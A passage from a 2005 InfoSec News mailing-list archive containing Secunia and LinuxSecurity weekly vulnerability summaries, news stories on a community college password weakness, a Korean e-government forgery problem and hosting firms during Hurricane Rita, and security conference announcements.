zebedee. This fixes a vulnerability, which can be exploited by malicious people to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/16892/ -- [SA16872] Unixware update for Libtiff Critical: Moderately critical Where: From remote Impact: System access Released: 2005-09-20 SCO has issued an update for Libtiff. This fixes a vulnerability, which potentially can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16872/ -- [SA16864] Gentoo update for apache/mod_ssl Critical: Moderately critical Where: From remote Impact: Security Bypass, Privilege escalation Released: 2005-09-19 Gentoo has issued an update for apache/mod_ssl. This fixes a security issue and a vulnerability, which potentially can be exploited by malicious people to bypass certain security restrictions, or by malicious, local users to gain escalated privileges via a specially crafted ".htaccess" file. Full Advisory: http://secunia.com/advisories/16864/ -- [SA16858] Webmin / Usermin PAM Authentication Bypass Vulnerability Critical: Moderately critical Where: From remote Impact: Security Bypass Released: 2005-09-20 Keigo Yamazaki has reported a vulnerability in Webmin and Usermin, which can be exploited by malicious people to bypass certain security restrictions. Full Advisory: http://secunia.com/advisories/16858/ -- [SA16856] Gentoo update for mailutils Critical: Moderately critical Where: From remote Impact: System access Released: 2005-09-19 Gentoo has issued an update for mailutils. This fixes a vulnerability, which can be exploited by malicious users to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16856/ -- [SA16849] SUSE update for squid Critical: Moderately critical Where: From remote Impact: DoS Released: 2005-09-16 SUSE has issued an update for squid. This fixes two vulnerabilities, which potentially can be exploited by malicious people to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/16849/ -- [SA16876] Tofu Game Engine Arbitrary Python Code Execution Vulnerability Critical: Moderately critical Where: From local network Impact: System access Released: 2005-09-20 Arc Riley has reported a vulnerability in Tofu, which can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/16876/ -- [SA16863] Gentoo workaround for py2play Critical: Moderately critical Where: From local network Impact: System access Released: 2005-09-19 Gentoo has published a workaround for py2play. This fixes a vulnerability, which can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/16863/ -- [SA16855] Py2Play Game Engine Arbitrary Python Code Execution Vulnerability Critical: Moderately critical Where: From local network Impact: System access Released: 2005-09-19 Arc Riley has reported a vulnerability in Py2Play, which can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/16855/ -- [SA16888] PerlDiver "module" Cross-Site Scripting Vulnerability Critical: Less critical Where: From remote Impact: Cross Site Scripting Released: 2005-09-21 Donnie Werner has reported a vulnerability in PerlDiver, which can be exploited by malicious people to conduct cross-site scripting attacks. Full Advisory: http://secunia.com/advisories/16888/ -- [SA16893] HP Tru64 UNIX FTP Daemon Denial of Service Vulnerability Critical: Less critical Where: From local network Impact: DoS Released: 2005-09-21 A vulnerability has been reported in HP Tru64 UNIX, which can be exploited by malicious users to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/16893/ -- [SA16885] Mandriva update for cups Critical: Less critical Where: From local network Impact: Security Bypass Released: 2005-09-21 Mandriva has issued an update for cups. This fixes a vulnerability, which can be exploited by malicious users to bypass certain security restrictions. Full Advisory: http://secunia.com/advisories/16885/ -- [SA16883] MasqMail Two Privilege Escalation Vulnerabilities Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2005-09-21 Jens Steube has reported two vulnerabilities in MasqMail, which potentially can be exploited by malicious, local users to gain escalated privileges. Full Advisory: http://secunia.com/advisories/16883/ -- [SA16874] Sun Solaris "tl" Driver Denial of Service Vulnerability Critical: Less critical Where: Local system Impact: DoS Released: 2005-09-20 A vulnerability has been reported in Solaris, which can be exploited by malicious, local users to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/16874/ -- [SA16866] Bacula Multiple Insecure Temporary File Creation Vulnerability Critical: Less critical Where: Local system Impact: Exposure of sensitive information, Privilege escalation Released: 2005-09-20 Eric Romang has reported some vulnerabilities in bacula, which can be exploited by malicious, local users to perform certain actions on a vulnerable system with escalated privileges, or to disclose certain sensitive information. Full Advisory: http://secunia.com/advisories/16866/ -- [SA16861] Trustix update for multiple packages Critical: Less critical Where: Local system Impact: Exposure of sensitive information, Privilege escalation, DoS Released: 2005-09-19 Trustix has issued updates for multiple packages. These fix some vulnerabilities, which potentially can be exploited by malicious, local users to disclose certain sensitive information, cause a DoS (Denial of Service), and gain escalated privileges. Full Advisory: http://secunia.com/advisories/16861/ -- [SA16860] Fedora update for xorg-x11 Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2005-09-19 Fedora has issued an update for xorg-x11. This fixes a vulnerability, which potentially can be exploited by malicious, local users to gain escalated privileges. Full Advisory: http://secunia.com/advisories/16860/ -- [SA16850] Debian update for kdebase Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2005-09-19 Debian has issued an update for kdebase. This fixes a vulnerability, which potentially can be exploited by malicious, local users to gain escalated privileges. Full Advisory: http://secunia.com/advisories/16850/ -- [SA16845] Sun Solaris X11 Pixmap Creation Integer Overflow Vulnerability Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2005-09-16 Sun Microsystems has acknowledged a vulnerability in Solaris, which potentially can be exploited by malicious, local users to gain escalated privileges. Full Advisory: http://secunia.com/advisories/16845/ -- [SA16842] Debian update for lm-sensors Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2005-09-16 Debian has issued an update for lm-sensors. This fixes a vulnerability, which can be exploited by malicious, local users to perform certain actions on a vulnerable system with escalated privileges. Full Advisory: http://secunia.com/advisories/16842/ -- [SA16835] SimpleCDR-X Insecure Temporary Image File Creation Critical: Less critical Where: Local system Impact: Exposure of sensitive information Released: 2005-09-16 Jonas Thambert has reported a security issue in SimpleCDR-X, which can be exploited by malicious, local users to gain access to sensitive information. Full Advisory: http://secunia.com/advisories/16835/ -- [SA16875] Safari "data:" URI Handler Denial of Service Weakness Critical: Not critical Where: From remote Impact: DoS Released: 2005-09-20 Jonathan Rockway has discovered a weakness in Safari, which can be exploited by malicious people to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/16875/ -- [SA16891] Gentoo update for util-linux Critical: Not critical Where: Local system Impact: Privilege escalation Released: 2005-09-21 Gentoo has issued an update for util-linux. This fixes a security issue, which potentially can be exploited by malicious, local users to gain escalated privileges. Full Advisory: http://secunia.com/advisories/16891/ -- [SA16882] Mandriva update for util-linux Critical: Not critical Where: Local system Impact: Privilege escalation Released: 2005-09-21 Mandriva has issued an update for util-linux. This fixes a security issue, which potentially can be exploited by malicious, local users to gain escalated privileges. Full Advisory: http://secunia.com/advisories/16882/ -- [SA16857] Ubuntu update for util-linux Critical: Not critical Where: Local system Impact: Privilege escalation Released: 2005-09-19 Ubuntu has issued an update for util-linux. This fixes a vulnerability, which potentially can be exploited by malicious, local users to gain escalated privileges. Full Advisory: http://secunia.com/advisories/16857/ Other:-- [SA16840] vxTftpSrv Long Filename Buffer Overflow Critical: Moderately critical Where: From local network Impact: DoS, System access Released: 2005-09-16 Seth Fogie has reported a vulnerability in vxTftpSrv, which can be exploited by malicious people to cause a DoS (Denial of Service), or potentially to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16840/ -- [SA16837] vxFtpSrv "USER" Command Buffer Overflow Vulnerability Critical: Moderately critical Where: From local network Impact: DoS, System access Released: 2005-09-16 Seth Fogie has reported a vulnerability in vxFtpSrv, which can be exploited by malicious people to cause a DoS (Denial of Service), or potentially to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16837/ -- [SA16836] Avocent CCM Port Access Control Bypass Vulnerability Critical: Less critical Where: From remote Impact: Security Bypass Released: 2005-09-16 Dirk Wetter has reported a vulnerability in Avocent CCM, which can be exploited by malicious users to bypass certain security restrictions. Full Advisory: http://secunia.com/advisories/16836/ -- [SA16839] vxWeb Denial of Service Vulnerability Critical: Less critical Where: From local network Impact: DoS Released: 2005-09-16 Seth Fogie has reported a vulnerability in vxWeb, which can be exploited by malicious people to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/16839/ Cross Platform:-- [SA16841] Digital Scribe "username" SQL Injection Critical: Highly critical Where: From remote Impact: Security Bypass, Manipulation of data, System access Released: 2005-09-16 rgod has discovered a vulnerability in Digital Scribe, which can be exploited by malicious people to conduct SQL injection attacks and compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16841/ -- [SA16896] Zengaia Unspecified SQL Injection Vulnerability Critical: Moderately critical Where: From remote Impact: Manipulation of data Released: 2005-09-21 A vulnerability has been reported in Zengaia, which can be exploited by malicious people to conduct SQL injection attacks. Full Advisory: http://secunia.com/advisories/16896/ -- [SA16881] Simplog SQL Injection Vulnerabilities Critical: Moderately critical Where: From remote Impact: Manipulation of data Released: 2005-09-21 r0ut3r has discovered some vulnerabilities in Simplog, which can be exploited by malicious people to conduct SQL injection attacks. Full Advisory: http://secunia.com/advisories/16881/ -- [SA16878] Land Down Under "Referer" SQL Injection Vulnerability Critical: Moderately critical Where: From remote Impact: Manipulation of data Released: 2005-09-21 A vulnerability has been discovered in Land Down Under, which can be exploited by malicious people to conduct SQL injection attacks. Full Advisory: http://secunia.com/advisories/16878/ -- [SA16867] PHP Advanced Transfer Manager Multiple Vulnerabilities Critical: Moderately critical Where: From remote Impact: Cross Site Scripting, Exposure of system information, Exposure of sensitive information Released: 2005-09-20 rgod has discovered some vulnerabilities and a security issue in PHP Advanced Transfer Manager, which can be exploited by malicious people to disclose system and sensitive information, and to conduct cross-site scripting attacks. Full Advisory: http://secunia.com/advisories/16867/ -- [SA16859] Helpdesk software Hesk Authentication Bypass Vulnerability Critical: Moderately critical Where: From remote Impact: Security Bypass, Exposure of system information Released: 2005-09-20 OS2A has reported a vulnerability in Helpdesk software Hesk, which can be exploited by malicious people to bypass certain security restrictions. Full Advisory: http://secunia.com/advisories/16859/ -- [SA16853] NooToplist "o" SQL Injection Vulnerability Critical: Moderately critical Where: From remote Impact: Manipulation of data Released: 2005-09-19 David Sopas Ferreira has reported a vulnerability in NooToplist, which can be exploited by malicious people to conduct SQL injection attacks. Full Advisory: http://secunia.com/advisories/16853/ -- [SA16843] PHP-Nuke Unspecified wysiwyg Editor Vulnerabilities Critical: Moderately critical Where: From remote Impact: Unknown Released: 2005-09-16 Some potential vulnerabilities have been reported in PHP-Nuke with unknown impacts . Full Advisory: http://secunia.com/advisories/16843/ -- [SA16873] vBulletin Multiple Vulnerabilities Critical: Less critical Where: From remote Impact: Cross Site Scripting, Manipulation of data, System access Released: 2005-09-20 Thomas Waldegger has reported some vulnerabilities in vBulletin, which can be exploited by malicious users to conduct SQL injection attacks and potentially compromise a vulnerable system, and by malicious people to conduct cross-site scripting attacks. Full Advisory: http://secunia.com/advisories/16873/ -- [SA16868] phpBB Remote Avatar Information Disclosure Weakness Critical: Not critical Where: From remote Impact: Exposure of system information Released: 2005-09-21 A weakness has been discovered in phpBB, which can be exploited by malicious people to disclose certain system information. Full Advisory: http://secunia.com/advisories/16868/ ======================================================================== Secunia recommends that you verify all advisories you receive, by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Subscribe: http://secunia.com/secunia_weekly_summary/ Contact details: Web : http://secunia.com/ E-mail : support@secunia.com Tel : +45 70 20 51 44 Fax : +45 70 20 51 45 From isn at c4i.org Mon Sep 26 00:04:11 2005 From: isn at c4i.org (InfoSec News) Date: Mon Sep 26 00:11:01 2005 Subject: [ISN] Linux Advisory Watch - September 23rd 2005 Message-ID: +---------------------------------------------------------------------+ | LinuxSecurity.com Weekly Newsletter | | September 23rd, 2005 Volume 6, Number 39a | +---------------------------------------------------------------------+ Editors: Dave Wreski Benjamin D. Thomas dave@linuxsecurity.com ben@linuxsecurity.com Linux Advisory Watch is a comprehensive newsletter that outlines the security vulnerabilities that have been announced throughout the week. It includes pointers to updated packages and descriptions of each vulnerability. This week, advisories were released for turqstat, centericq, lm-sensors, kdebase, python, XFree86, Mailutils, Shorewall, mozilla, mod_ssl, clam, mod_ssl, Zebedee, umount, squid, and mod_ssl. The distributors include Debian, Fedora, Gentoo, and Red Hat. --- ## Master of Science in Information Security ## Earn your Master of Science in Information Security online from Norwich University. Designated a "Center of Excellence", the program offers a solid education in the management of information assurance, and the unique case study method melds theory into practice. Using today's e-Learning technology, you can earn this esteemed degree, without disrupting your career or home life. LEARN MORE: http://www.msia.norwich.edu/linux_en --- Security Basics In the ever-changing world of global data communications, inexpensive Internet connections, and fast-paced software development, security is becoming more and more of an issue. Security is now a basic requirement because global computing is inherently insecure. As your data goes from point A to point B on the Internet, for example, it may pass through several other points along the way, giving other users the opportunity to intercept, and even alter, your data. Even other users on your system may maliciously transform your data into something you did not intend. Unauthorized access to your system may be obtained by intruders, also known as ``crackers'', who then use advanced knowledge to impersonate you, steal information from you, or even deny you access to your own resources. If you're still wondering what the difference is between a ``Hacker'' and a ``Cracker'', see Eric Raymond's document, ``How to Become A Hacker'', available at: http://www.catb.org/~esr/faqs/hacker-howto.html How Vulnerable Are We? While it is difficult to determine just how vulnerable a particular system is, there are several indications we can use: * The Computer Emergency Response Team consistently reports an increase in computer vulnerabilities and exploits. * TCP and UDP, the protocols that comprise the Internet, were not written with security as their first priority when it was created more than 30 years ago. * A version of software on one host has the same vulnerabilities as the same version of software on another host. Using this information, an intruder can exploit multiple systems using the same attack method. * Many administrators don't even take simple security measures necessary to protect their site, or don't understand the ramifications of implementing some services. Many administrators are not given the additional time necessary to integrate the necessary security measures. Excerpt from the LinuxSecurity Administrator's Guide: http://www.linuxsecurity.com/docs/SecurityAdminGuide/SecurityAdminGuide.html Written by: Dave Wreski (dave@guardiandigital.com) ---------------------- Linux File & Directory Permissions Mistakes One common mistake Linux administrators make is having file and directory permissions that are far too liberal and allow access beyond that which is needed for proper system operations. A full explanation of unix file permissions is beyond the scope of this article, so I'll assume you are familiar with the usage of such tools as chmod, chown, and chgrp. If you'd like a refresher, one is available right here on linuxsecurity.com. http://www.linuxsecurity.com/content/view/119415/49/ --- Buffer Overflow Basics A buffer overflow occurs when a program or process tries to store more data in a temporary data storage area than it was intended to hold. Since buffers are created to contain a finite amount of data, the extra information can overflow into adjacent buffers, corrupting or overwriting the valid data held in them. http://www.linuxsecurity.com/content/view/119087/49/ --- Review: The Book of Postfix: State-of-the-Art Message Transport I was very impressed with "The Book of Postfix" by authors Ralf Hildebrandt and Pattrick Koetter and feel that it is an incredible Postfix reference. It gives a great overall view of the operation and management of Postfix in an extremely systematic and practical format. It flows in a logical manner, is easy to follow and the authors did a great job of explaining topics with attention paid to real world applications and how to avoid many of the associated pitfalls. I am happy to have this reference in my collection. http://www.linuxsecurity.com/content/view/119027/49/ -------- --> Take advantage of the LinuxSecurity.com Quick Reference Card! --> http://www.linuxsecurity.com/docs/QuickRefCard.pdf +---------------------------------+ | Distribution: Debian | ----------------------------// +---------------------------------+ * Debian: New turqstat packages fix buffer overflow 15th, September, 2005 Updated package. http://www.linuxsecurity.com/content/view/120389 * Debian: New centericq packages fix several vulnerabilities 15th, September, 2005 Updated package. http://www.linuxsecurity.com/content/view/120392 * Debian: New lm-sensors packages fix insecure temporary file 15th, September, 2005 Updated package. http://www.linuxsecurity.com/content/view/120395 * Debian: New kdebase packages fix local root vulnerability 16th, September, 2005 Updated package. http://www.linuxsecurity.com/content/view/120399 * Debian: New python2.2 packages fix arbitrary code execution 22nd, September, 2005 Updated package. http://www.linuxsecurity.com/content/view/120425 * Debian: New XFree86 packages fix arbitrary code execution 22nd, September, 2005 Updated package. http://www.linuxsecurity.com/content/view/120426 +---------------------------------+ | Distribution: Fedora | ----------------------------// +---------------------------------+ * Fedora Core 4 Update: dia-0.94-12.fc4 16th, September, 2005 Updated package. http://www.linuxsecurity.com/content/view/120400 * Fedora Core 4 Update: qt-3.3.4-15.4 16th, September, 2005 Updated package. http://www.linuxsecurity.com/content/view/120401 +---------------------------------+ | Distribution: Gentoo | ----------------------------// +---------------------------------+ * Gentoo: Py2Play Remote execution of arbitrary Python 17th, September, 2005 A design error in Py2Play allows attackers to execute arbitrary code. http://www.linuxsecurity.com/content/view/120402 * Gentoo: Mailutils Format string vulnerability in imap4d 17th, September, 2005 The imap4d server contains a vulnerability allowing an authenticated user to execute arbitrary code with the privileges of the imap4d process. http://www.linuxsecurity.com/content/view/120403 * Gentoo: Shorewall Security policy bypass 17th, September, 2005 A vulnerability in Shorewall allows clients authenticated by MAC address filtering to bypass all other security rules. http://www.linuxsecurity.com/content/view/120404 * Gentoo: Mozilla Suite, Mozilla Firefox Buffer overflow 18th, September, 2005 Mozilla Suite and Firefox are vulnerable to a buffer overflow that might be exploited to execute arbitrary code. http://www.linuxsecurity.com/content/view/120405 * Gentoo: Apache, mod_ssl Multiple vulnerabilities 19th, September, 2005 mod_ssl and Apache are vulnerable to a restriction bypass and a potential local privilege escalation. http://www.linuxsecurity.com/content/view/120408 * Gentoo: Clam AntiVirus Multiple vulnerabilities 19th, September, 2005 Clam AntiVirus is subject to vulnerabilities ranging from Denial of Service to execution of arbitrary code when handling compressed executables. http://www.linuxsecurity.com/content/view/120409 * Gentoo: Apache, mod_ssl Multiple vulnerabilities 19th, September, 2005 mod_ssl and Apache are vulnerable to a restriction bypass and a potential local privilege escalation. http://www.linuxsecurity.com/content/view/120411 * Gentoo: Shorewall Security policy bypass 19th, September, 2005 A vulnerability in Shorewall allows clients authenticated by MAC address filtering to bypass all other security rules. http://www.linuxsecurity.com/content/view/120412 * Gentoo: Zebedee Denial of Service vulnerability 20th, September, 2005 A bug in Zebedee allows a remote attacker to perform a Denial of Service attack. http://www.linuxsecurity.com/content/view/120417 * Gentoo: util-linux umount command validation error 20th, September, 2005 A command validation error in umount can lead to an escalation of privileges. http://www.linuxsecurity.com/content/view/120418 +---------------------------------+ | Distribution: Red Hat | ----------------------------// +---------------------------------+ * RedHat: Important: XFree86 security update 15th, September, 2005 This update has been rated as having important security impact by the Red Hat Security Response Team. http://www.linuxsecurity.com/content/view/120390 * RedHat: Important: squid security update 15th, September, 2005 An updated Squid package that fixes security issues is now available. This update has been rated as having important security impact by the Red Hat Security Response Team. http://www.linuxsecurity.com/content/view/120391 * RedHat: Important: mod_ssl security update 15th, September, 2005 An updated mod_ssl package for Apache that corrects a security issue is now available. This update has been rated as having important security impact by the Red Hat Security Response Team. http://www.linuxsecurity.com/content/view/120396 ------------------------------------------------------------------------ Distributed by: Guardian Digital, Inc. LinuxSecurity.com To unsubscribe email vuln-newsletter-request@linuxsecurity.com with "unsubscribe" in the subject of the message. ------------------------------------------------------------------------ From isn at c4i.org Mon Sep 26 00:04:31 2005 From: isn at c4i.org (InfoSec News) Date: Mon Sep 26 00:11:19 2005 Subject: [ISN] Virginia Western student prompts quick fix of computer security Message-ID: http://www.roanoke.com/news/roanoke/wb/wb/xp-33313 By Cody Lowe The Roanoke Times September 23, 2005 Every student, faculty member and staffer in the Virginia Community College System is being alerted to a significant threat to its online access system. A Virginia Western Community College student contacted The Roanoke Times this week about the potential for outsiders to gain easy access to students' e-mail addresses and default passwords - their birth dates - through a national online directory called Facebook. After the newspaper contacted the statewide system's administrators in Richmond, they began pushing up the implementation of new login procedures for all of the state's 23 community colleges. "The student who reported this to you did us quite a service," said David Harrison, head of Technical Support Services at Virginia Western. It wasn't that the system's administrators weren't aware of the potential problem, said Neil Matkin, Richmond-based vice chancellor for information technology for the 350,000-student statewide system. But the knowledge that word was spreading about the chink in the system's armor prompted immediate action, rather than waiting for spring, he said. The system's technology council, with representatives from each school, is scheduled to vote in a conference call today on implementing changes to help reduce the risks. Among the options would be to compel students to change their passwords the first time they enter the system. In the meantime, Harrison said, everyone with a Virginia community college e-mail address is being alerted to the potential problem. "We're highly advising anybody using their default password to change it immediately," Harrison said. "We're also putting messages out on all the home pages of the services we offer." He's also recommending students remove their addresses from the Facebook Web site. Facebook - www.thefacebook.com - provides a way for college students to meet each other by posting a picture and personal profile online, accessible by others who have legitimate college e-mail addresses. It now has 3 million users nationwide at 800 colleges. The Roanoke student who noticed the problem, Joe Swindell, might be called an anti-hacker. When he found the vulnerability, he worried that it was distressingly easy for a hacker - even the most unsophisticated one - to gain access to students' personal accounts. He decided to contact the newspaper. Swindell worked as a security technician assistant as a student at Lees-McRae College in North Carolina last year, he said, so when he noticed the flaw in the Virginia Western system, "I ran off with that." Swindell confirmed that most of the users included their birth dates in their profiles. That's when the red flag went up. The Virginia Community College System automatically assigns students their birth dates as their passwords to access all their college accounts online. While students are "strongly encouraged" to change the passwords once they enter the system, Harrison said, many do not. So anyone with access to Facebook could look up other students at Virginia Western, get, their e-mail addresses and birth dates, then access their personal accounts. A hacker could wreak havoc by changing the password, submitting bogus e-mail, or - at the right time of the year - even enroll or drop the other student from classes. Swindell's concern was "very well founded," conceded Matkin, even though it is difficult to determine exactly how many of the system's students also use Facebook or have their birth dates listed there. Matkin said the computer code to fix the problem has been ready for months. The colleges delayed implementing it this fall, however, because they were upgrading a group of other major systems for students and hoped to minimize confusion and pressure on each college's help desk. "We were trying to make [the entire process] student friendly, making the password something that was easily remembered," but wouldn't be commonly known, Matkin said. "You don't wear it on your forehead." However, "Facebook has caused unprecedented problems," he said. "We didn't expect that." Harrison said he believes students are sometimes too lax about what they post. "It's a case of providing a little too much personal information" in a place where it can be seen by millions of people, Harrison said. "With the Internet, people don't have to fish for information; a lot of times you just give it to them." "Somehow we have to get out to students good security practices. A lot of the information they put on internet, they don't realize can be used for bad things. This is one of those things." "There is a chance absolutely nothing will happen, but it's one that we're concerned about," Harrison said. "It's very important to us that we maintain data integrity." Swindell said he just wanted to help. "I'm only trying to point out the problem. Something needed to be changed. ... I think this is great." From isn at c4i.org Mon Sep 26 00:06:06 2005 From: isn at c4i.org (InfoSec News) Date: Mon Sep 26 00:11:56 2005 Subject: [ISN] PacSec05 Message-ID: Forwarded from: Dragos Ruiu English url: http://pacsec.jp/index.html?LANG=ENGLISH Japanese url: http://pacsec.jp/index.html?LANG=JAPANESE Myamoto Musashi famous swordsman and author of "Go Rin No Sho" (the Book of Five Rings) wrote "Study the Way of all professions." In the way of computer networks, one must understand attacks before one can forestall them. I would like to announce the selection of the PacSec applied technical security seminar presentations. The event will be held on November 15/16 in Tokyo, Japan, at the Aoyama Diamond Hall, accessible at exit B5 of the Omotesando station, on Ginza or Hanzomon lines. The selected papers are: Andrea Barisani - Gentoo Building a modern LDAP based security framework. Cedric "Sid" Blancher - EADS WiFi traffic injection based attacks Javier Burroni - CORE SDI Using Neural Networks for remote OS identification Maximillian Dornseif - Laboratory for Dependable Distribute Systems Watching hackers hack - attack visualization van Hauser - thc Attacking the IPv6 protocol suite Adam Jacobs - Oracle Commercial Software and How Can We Fix It? Chris Jordan - Endeavor Systems Writing Better Intrusion Prevention Signatures Hiroshi Shinotsuka - Symantec Advances in Trojan Threats Feng "Sowhat" Xue - 3rd Research Institute, Ministry of Public Security, Chinese National Anti-Intrusion and Anti-virus Research Center Talking About 0day Ilja van Sprundel - Suresec Unix Kernel Auditing Window Snyder - formerly Microsoft A new perspective on internal security. Yuji Ukai - eeye Real-Time OS Based Embedded Systems Using the JTAG Emulator Marc Uemura - PWC Fault Redundant IPV6 Wireless Firewalls Christian Wieser - Oulu University Secure Programming Group VoIP: SIP robustness and RTP security All presentations are in both Japanese and English. Registration is on line at http://pacsec.jp ********************************************************** Security Masters Dojo, Tokyo ---------------------------------- The Tokyo Security Masters Dojo will be held on November 14, also at the Aoyama Diamond Hall. The following one day advanced and intermediate applied information security courses will be offered: Sinan 'noir' Eren & Nicolas Waisman - Immunity Win32 Reliable Heap Explotation Gerardo Richarte - Core Security Technologies Assembly for Exploit Writing Marty Roesch - Sourcefire Advanced IDS Deployment and Optimization Maximillian Dornseif & Thorsten Holtz - Aachen University Advanced Honeypot Tactics Philippe Biondi - EADS Mastering the Network with SCAPY As with all Dojo courses, to ensure that each student gets individual training from the instructors in the hands-on labs, class size will be limited to ten students per course. Each course is one day, and features practical exercises to help maximize knowledge retention. Dojo registration will be available shortly under the "DOJO" tab on http://pacsec/.jp along with expanded course information. CanSecWest/core06 final dates: April 5-7 2006 Early Discount Registration is on-line at: http://cansecwest.com/register.html Dojo/Vancouver dates: April 3-5 2006 Dojo/Vancouver Registration is not available yet. cheers, --dr -- World Security Pros. Cutting Edge Training, Tools, and Techniques Tokyo, Japan November 14-16 2005 http://pacsec.jp pgpkey http://dragos.com/ kyxpgp From isn at c4i.org Mon Sep 26 00:06:22 2005 From: isn at c4i.org (InfoSec News) Date: Mon Sep 26 00:12:16 2005 Subject: [ISN] Surviving Rita: A tale of two data centers Message-ID: http://www.computerworld.com/securitytopics/security/recovery/story/0,10801,104940,00.html By Todd R. Weiss SEPTEMBER 24, 2005 COMPUTERWORLD For the second hurricane in a row, New Orleans-based Web hosting vendor and Internet domain name registrar DirectNIC managed to stay up and running overnight as Hurricane Rita pounded the Gulf Coast before coming ashore early this morning. Sigmund Solares, CEO of Intercosmos Media Group Inc., which owns DirectNIC, rode out Hurricane Rita in New Orleans last night and was busy assessing damage this morning. Solares said his company, located on the 10th floor of a downtown New Orleans office building, was still dealing with broken windows and other damage left from Katrina, which plowed through the area Aug. 29. During that storm - and despite massive flooding in much of New Orleans after -- DirectNIC's operations continued uninterrupted because it had an emergency generator and an adequate fuel supply, he said. DirectNIC has approximately 800 hosted servers. "We definitely got hurt by Katrina and we still have a ways to go [to get completely cleaned up] but we remained open the whole time," Solares said. Even as Rita's strong winds brushed by last night, ripping tin pieces from neighboring structures and hurtling them at DirectNIC's building, Solares said he and his four team members were much less worried than when Katrina struck. "It's still windy outside," he said this morning. "It's still gusty. [But] right now, we are feeling much better than at any time during Katrina." Solares said he got a good night's sleep inside an internal office in the building, where he was able to get away from the howling winds outside. The building continued to have electricity until 7:59 a.m. - more than four hours after the storm struck near the Louisiana-Texas border. The power went out then, and battery backups kicked on instantaneously, followed by a backup emergency generator, he said. The outage only lasted 11 minutes, however, and the company's servers remained up and running. Looking outside, Solares said damage to neighboring buildings doesn't look as bad as when Katrina hit. Floodwaters didn't reach his building during the last storm, nor did they do so this time. "With Katrina, when the levees broke, I could see the flooding a half a block away," he said. "I'm looking where there was flooding [before] and I don't see any water there right now." In other parts of the city, particularly the Ninth Ward, floodwaters cascaded over newly-repaired levee walls yesterday, causing more problems in low-lying areas. During Katrina, and again last night, DirectNIC's employees had to build a makeshift levee of their own. Rainwater began entering through the ceiling from broken windows on the floor above, Solares said, forcing him and his staff to use mops, a wet-dry vacuum machine and bundles of promotional T-shirts to create what he called the company's own "levee system" to keep water away from servers and other electronic gear. Those same methods came in handy again last night, he said, since building repairs have not yet been made. Before Rita drew near, Solares and his crew installed plywood over the open windows and used sealant and tarps, hoping to keep out as much rain as possible. The makeshift repairs helped, he said. Earlier this week, as Rita swirled in the Gulf of Mexico as a dangerous category 5 storm, Solares called a competing Web hosting vendor in Houston, EV1Servers.net, and offered help in case Rita hit Houston dead-on. "For us, there's a lot we can do," Solares said. "It's not much effort for us to help people get back up and running." DirectNIC has extra space and capacity for servers and can make that space available to others in an emergency, he said. "We're lucky that we've always saved for a rainy day and that we're able to help our employees and try to help other people, even though it's a very tough time for us overall," Solares said. "It's also good for morale for our employees to see us helping other people in need." In Houston, Robert Marsh, the CEO of EV1Servers.net, said early today that because Hurricane Rita tracked farther toward the east, away from Houston, the city was spared the storm's worst effects (see "Update: As Rita drew near, Web hosting vendor prepared" [1]). The highest wind gusts were in the 50-mph-to-60-mph range, far lower than the 120 mph winds expected at one point. By this morning, only an inch of rain had fallen in the area where EV1's data centers are located, he said. "In this instance, we were very fortunate not to have received the worst," he said. Overnight, the company switched over to its emergency generators after some nearby power transformers blew up. EV1 plans to return to utility power sometime today after stable power flow is maintained for at least five hours, he said. About 25 EV1 employees stayed overnight inside the company's offices and two data centers to maintain services for customers. The company had also sent seven Web technicians to a hotel in Wichita, Kan. to remotely handle customer trouble tickets had its main data centers been knocked out by the storm. "Our trouble ticket load is essentially back to normal at this time," Marsh said today. "If the storm continues to clear, we hope to bring our people back from Wichita as early as Sunday night." [1] http://www.computerworld.com/securitytopics/security/recovery/story/0,10801,104892,00.html From isn at c4i.org Mon Sep 26 00:03:36 2005 From: isn at c4i.org (InfoSec News) Date: Mon Sep 26 00:12:39 2005 Subject: [ISN] Ministry halts online service on hacking fears Message-ID: http://joongangdaily.joins.com/200509/23/200509232253101239900090609061.html By Seo Ji-eun September 24, 2005 The government service of issuing copies of civil documents online will be temporarily suspended due to security problems. The Ministry of Government Administration and Home Affairs said yesterday that it would temporarily halt the service until it seals security loopholes that have enabled hackers to invade its Web site (www.egov.co.kr) and forge civil documents such as the residence registry. "It has become common knowledge that documents issued on the Internet could be forged, thus opening doors for some people to make ill use of them when submitting documents to financial agencies," Minister of Government Administration Oh Young-kyo said in a National Assembly special audit session. As of yesterday, the Web site stopped issuing 21 kinds of civil documents, including resident, land, construction and military registrations. About 20,000 documents have been issued since the service was launched in September 2003. The service's suspension is thought likely to cause a great deal of inconvenience to the disabled or those households whose family members are too busy to visit government offices. An official from the Administration Ministry said it would take about a month to completely establish a hacking-prevention system. Earlier in the day, Representative Kwon Oh-eul of the opposition Grand National Party demonstrated at the National Assembly how easy it is to forge documents downloaded from the Web site the government has been touting as part of an ambitious digital venture project. Mr. Kwon pointed out that the hackers can forge and print documents directly from the Web site, instead of having to download them and modify the image files using high-quality copiers or scanners. Out of a total 2.57 million documents issued since the service started, only 0.5 percent, or 13,000, underwent the hacking-prevention process of receiving security authorization, he said. From isn at c4i.org Mon Sep 26 00:04:53 2005 From: isn at c4i.org (InfoSec News) Date: Mon Sep 26 00:13:06 2005 Subject: [ISN] ACSAC in Tucson in Dec. - Registration now open! Message-ID: Forwarded from: ACSAC Announcement List I'm writing to encourage you to look at the Advance Program for the 